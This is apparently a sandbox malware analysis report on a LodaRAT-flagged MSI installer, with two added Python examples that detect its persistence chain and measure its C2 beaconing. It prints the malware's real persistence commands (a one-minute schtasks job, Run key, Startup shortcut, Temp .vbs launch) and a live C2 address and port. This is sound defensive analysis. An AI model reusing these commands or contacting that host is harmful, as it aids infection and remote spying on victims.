
Windows Analysis Report
sdlvrr.msi

Overview

General Information

Sample name: sdlvrr.msi
Analysis ID: 1582342
MD5: 3e83644e86d6165d35a80650d01df249
SHA1: f3f82555822edc27b3ec559686e7d7b23153761b
SHA256: 5cbae41670f29829cbbeb50560a2184385e25c109dcbf3bfcff6656bfc09ae32
Tags: knkbkk212, msi, user-JAMESWT_MHT

Detection

Detection: LodaRAT
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • msiexec.exe (PID: 7664 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sdlvrr.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7696 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • MSI4976.tmp (PID: 7764 cmdline: "C:\Windows\Installer\MSI4976.tmp" MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
      • cmd.exe (PID: 7812 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7864 cmdline: schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7852 cmdline: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs MD5: FF00E0480075B095948000BDC66E81F0)
  • SRACMB.exe (PID: 7916 cmdline: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • SRACMB.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe" MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • SRACMB.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe" MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • SRACMB.exe (PID: 5296 cmdline: "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe" MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • SRACMB.exe (PID: 3648 cmdline: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • SRACMB.exe (PID: 7544 cmdline: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • cleanup
Name: Loda, LodaRAT
Description: Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
No configs have been found
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000006.00000002.2614707550.0000000003830000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000006.00000002.2614274905.00000000032A7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000003.00000002.2616737221.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000006.00000002.2614274905.00000000032C7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
Process Memory Space: MSI4976.tmp PID: 7764 | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
(No matched strings are listed for any entry; 3 further entries were not expanded in this export.)

              System Summary

Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Windows\Installer\MSI4976.tmp, Initiated: true, ProcessId: 7764, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49817
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI4976.tmp", ParentImage: C:\Windows\Installer\MSI4976.tmp, ParentProcessId: 7764, ParentProcessName: MSI4976.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, ProcessId: 7852, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI4976.tmp", ParentImage: C:\Windows\Installer\MSI4976.tmp, ParentProcessId: 7764, ParentProcessName: MSI4976.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, ProcessId: 7852, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI4976.tmp", ParentImage: C:\Windows\Installer\MSI4976.tmp, ParentProcessId: 7764, ParentProcessName: MSI4976.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, ProcessId: 7852, ProcessName: wscript.exe
Source: Process started | Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community | Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Installer\MSI4976.tmp", ParentImage: C:\Windows\Installer\MSI4976.tmp, ParentProcessId: 7764, ParentProcessName: MSI4976.tmp, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, ProcessId: 7812, ProcessName: cmd.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Installer\MSI4976.tmp, ProcessId: 7764, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VYZSPQ
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Windows\Installer\MSI4976.tmp, ProcessId: 7764, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VYZSPQ.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, CommandLine: schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7812, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, ProcessId: 7864, ProcessName: schtasks.exe
Source: Process started | Author: Michael Haag | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI4976.tmp", ParentImage: C:\Windows\Installer\MSI4976.tmp, ParentProcessId: 7764, ParentProcessName: MSI4976.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, ProcessId: 7852, ProcessName: wscript.exe
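The Sigma hits above all come from one chain: the msiexec custom action (MSI4976.tmp) spawns cmd.exe to register a one-minute scheduled task pointing into %AppData%, runs a .vbs out of the user's Temp folder, writes a Run key and a Startup-folder .lnk, and opens an outbound connection on TCP 5552. The following is an added example, not part of the Joe Sandbox report or of any Sigma rule, that expresses the same detection logic as plain Python predicates over Sysmon-style events. The events are reconstructed from the Data: fields listed above (Sysmon field names, only the fields the rules read), plus one constructed benign scheduled-task creation that must not fire; the rule names, the user-writable path list and the frequency threshold are this example's own choices.

```python
"""Detection rules for the execution and persistence chain in this report, run
over Sysmon-style events. Rule names and thresholds are this example's own."""
import re

# Events reconstructed from the Sigma "Data:" lines of this report (Sysmon field
# names; only fields the rules read are kept), plus one constructed benign
# scheduled-task creation (pid 9001) as a control that must not fire.
EVENTS = [
    {"EventID": 1, "ProcessId": 7812, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\Installer\MSI4976.tmp",
     "CommandLine": r"C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe "
                    r"/tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1"},
    {"EventID": 1, "ProcessId": 7864, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"schtasks /create /tn VYZSPQ.exe "
                    r"/tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1"},
    {"EventID": 1, "ProcessId": 7852, "Image": r"C:\Windows\SysWOW64\wscript.exe",
     "ParentImage": r"C:\Windows\Installer\MSI4976.tmp",
     "CommandLine": r"WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs"},
    {"EventID": 13, "ProcessId": 7764, "Image": r"C:\Windows\Installer\MSI4976.tmp",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VYZSPQ",
     "Details": r'"C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"'},
    {"EventID": 11, "ProcessId": 7764, "Image": r"C:\Windows\Installer\MSI4976.tmp",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VYZSPQ.lnk"},
    {"EventID": 3, "ProcessId": 7764, "Image": r"C:\Windows\Installer\MSI4976.tmp",
     "Initiated": True, "DestinationIp": "172.111.138.100", "DestinationPort": 5552},
    {"EventID": 1, "ProcessId": 9001, "Image": r"C:\Windows\System32\schtasks.exe",  # constructed control
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /create /tn VendorUpdate /tr C:\Program Files\Vendor\upd.exe /sc daily"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = SCRIPT_HOSTS | {"cmd.exe", "powershell.exe"}
# Folders a standard user can write to; a task action living here was dropped, not installed.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")
INSTALLER_DIR = "c:\\windows\\installer\\"


def _image_name(e):
    return e.get("Image", "").lower().rsplit("\\", 1)[-1]


def schtasks_user_writable_target(e):
    if e["EventID"] != 1 or _image_name(e) != "schtasks.exe":
        return False
    cmd = e["CommandLine"].lower()
    return "/create" in cmd and any(p in cmd for p in USER_WRITABLE)


def schtasks_high_frequency(e):
    # "/sc minute /mo 1..5" is a watchdog that relaunches the payload every few minutes.
    if e["EventID"] != 1 or _image_name(e) != "schtasks.exe":
        return False
    return re.search(r"/sc\s+minute\s+/mo\s+[1-5]\b", e["CommandLine"], re.I) is not None


def script_interpreter_from_temp(e):
    if e["EventID"] != 1 or _image_name(e) not in SCRIPT_HOSTS:
        return False
    cmd = e["CommandLine"].lower()
    return "\\appdata\\local\\temp\\" in cmd and re.search(r"\.(vbs|vbe|js|jse|wsf)\b", cmd) is not None


def installer_tmp_spawns_shell(e):
    # msiexec custom actions run as C:\Windows\Installer\MSIxxxx.tmp; they have no business starting shells.
    parent = e.get("ParentImage", "").lower()
    return (e["EventID"] == 1 and parent.startswith(INSTALLER_DIR)
            and parent.endswith(".tmp") and _image_name(e) in SHELLS)


def run_key_autorun(e):
    return e["EventID"] == 13 and "\\currentversion\\run\\" in e["TargetObject"].lower()


def startup_folder_write(e):
    return e["EventID"] == 11 and "\\start menu\\programs\\startup\\" in e["TargetFilename"].lower()


def installer_tmp_callback(e):
    # Outbound connection initiated by an installer custom-action binary.
    return e["EventID"] == 3 and bool(e.get("Initiated")) and e["Image"].lower().startswith(INSTALLER_DIR)


RULES = [schtasks_user_writable_target, schtasks_high_frequency, script_interpreter_from_temp,
         installer_tmp_spawns_shell, run_key_autorun, startup_folder_write, installer_tmp_callback]


def run_rules(events):
    """Return (rule name, ProcessId) for every rule that matches an event."""
    return [(rule.__name__, e["ProcessId"]) for e in events for rule in RULES if rule(e)]


if __name__ == "__main__":
    for name, pid in run_rules(EVENTS):
        print(f"{name:32s} pid={pid}")
```

Run against the reconstructed events, every rule fires at least once and the benign control fires nothing; pid 7852 (wscript) trips two rules because its parent is the installer .tmp and its script sits in Temp, which is the kind of stacking that makes this chain cheap to alert on even when any single rule is noisy in isolation.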
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49984 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49976 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49983 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49985 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49977 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49979 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49980 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49869 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49981 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49982 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49817 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:24.387568+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49929 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:41.848807+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49817 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:35:51.094216+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49869 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:00.201860+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49929 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:09.217517+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49976 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:18.283230+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49977 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:27.296276+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49979 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:36.378336+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49980 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:45.679041+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49981 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:59.623794+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49982 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:37:09.091777+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49983 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:37:18.155276+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49984 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:37:27.170694+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49985 | 172.111.138.100 | 5552 | TCP
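Two things stand out in the alert table: the first twelve rows share one timestamp to the microsecond (a log flush, not twelve simultaneous connections), and after that a fresh TCP connection to 172.111.138.100:5552 appears roughly every nine seconds, each from a new source port. The signature that fired is by name an ET PRO mobile-malware rule, which does not fit a Windows MSI; the durable evidence is the classtype and the connection cadence itself. The following is an added example, not part of the Joe Sandbox report, that measures that cadence: it groups alerts per (source, destination, port) flow, collapses rows with identical timestamps into one event, and scores regularity as MAD divided by median of the inter-event gaps, which is robust to the occasional longer gap. The timestamps and ports are copied from the table above; the threshold values and the flow key are this example's own choices.

```python
"""Beacon-interval analysis of the C2 check-ins listed in this report's Suricata table."""
from collections import defaultdict
from datetime import datetime
from statistics import median

# (timestamp, source port) copied from the Suricata table of this report; every
# row is SID 2849885, 192.168.2.9 -> 172.111.138.100:5552 over TCP.
SRC, DST, DPORT = "192.168.2.9", "172.111.138.100", 5552
ROWS = [
    ("2024-12-30T11:35:24.387568+0100", 49984), ("2024-12-30T11:35:24.387568+0100", 49976),
    ("2024-12-30T11:35:24.387568+0100", 49983), ("2024-12-30T11:35:24.387568+0100", 49985),
    ("2024-12-30T11:35:24.387568+0100", 49977), ("2024-12-30T11:35:24.387568+0100", 49979),
    ("2024-12-30T11:35:24.387568+0100", 49980), ("2024-12-30T11:35:24.387568+0100", 49869),
    ("2024-12-30T11:35:24.387568+0100", 49981), ("2024-12-30T11:35:24.387568+0100", 49982),
    ("2024-12-30T11:35:24.387568+0100", 49817), ("2024-12-30T11:35:24.387568+0100", 49929),
    ("2024-12-30T11:35:41.848807+0100", 49817), ("2024-12-30T11:35:51.094216+0100", 49869),
    ("2024-12-30T11:36:00.201860+0100", 49929), ("2024-12-30T11:36:09.217517+0100", 49976),
    ("2024-12-30T11:36:18.283230+0100", 49977), ("2024-12-30T11:36:27.296276+0100", 49979),
    ("2024-12-30T11:36:36.378336+0100", 49980), ("2024-12-30T11:36:45.679041+0100", 49981),
    ("2024-12-30T11:36:59.623794+0100", 49982), ("2024-12-30T11:37:09.091777+0100", 49983),
    ("2024-12-30T11:37:18.155276+0100", 49984), ("2024-12-30T11:37:27.170694+0100", 49985),
]
ALERTS = [{"ts": ts, "src": SRC, "sport": sp, "dst": DST, "dport": DPORT} for ts, sp in ROWS]


def parse_ts(ts):
    # Report timestamps carry microseconds and a numeric UTC offset (+0100).
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def beacon_profile(alerts, min_events=6, max_jitter=0.10):
    """Per (src, dst, dport) flow: connection count, median gap and jitter.

    jitter = MAD / median of the inter-event gaps. A scripted beacon sits well
    below 0.1; human-driven traffic spreads far wider. Thresholds are this
    example's own assumptions, not values from the report.
    """
    flows = defaultdict(list)
    for a in alerts:
        flows[(a["src"], a["dst"], a["dport"])].append(parse_ts(a["ts"]))

    out = {}
    for flow, stamps in flows.items():
        uniq = sorted(set(stamps))  # rows sharing a timestamp were flushed together: one event
        gaps = [(b - a).total_seconds() for a, b in zip(uniq, uniq[1:])]
        if len(gaps) < 2:
            out[flow] = {"connections": len(stamps), "unique_timestamps": len(uniq),
                         "median_interval_s": None, "jitter": None, "beacon": False}
            continue
        med = median(gaps)
        mad = median(abs(g - med) for g in gaps)
        jitter = mad / med if med else float("inf")
        out[flow] = {
            "connections": len(stamps),
            "unique_timestamps": len(uniq),
            "median_interval_s": round(med, 3),
            "jitter": round(jitter, 4),
            "beacon": len(uniq) >= min_events and jitter <= max_jitter,
        }
    return out


if __name__ == "__main__":
    for flow, prof in beacon_profile(ALERTS).items():
        print(flow, prof)
```

On this data the flow resolves to 24 connections over 13 distinct timestamps, a median gap just over nine seconds and a jitter below 0.01, which is why the median/MAD pair is preferable to mean/stddev here: the 17 s and 14 s gaps in the series would inflate a standard deviation but barely move the median.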


              AV Detection

Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | ReversingLabs: Detection: 52%
Source: C:\Windows\Installer\MSI4976.tmp | ReversingLabs: Detection: 52%
Source: sdlvrr.msi | Virustotal: Detection: 50%
Source: sdlvrr.msi | ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Joe Sandbox ML: detected
Source: C:\Windows\Installer\MSI4976.tmp | Joe Sandbox ML: detected
Source: C:\Windows\System32\msiexec.exe | File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, a:
Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | File opened: c:
Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0033DD92 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00372044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0037219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_003724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00366B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00366E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0036F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0036FD47 FindFirstFileW,FindClose
Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0036FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_00102044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0010219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_001024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
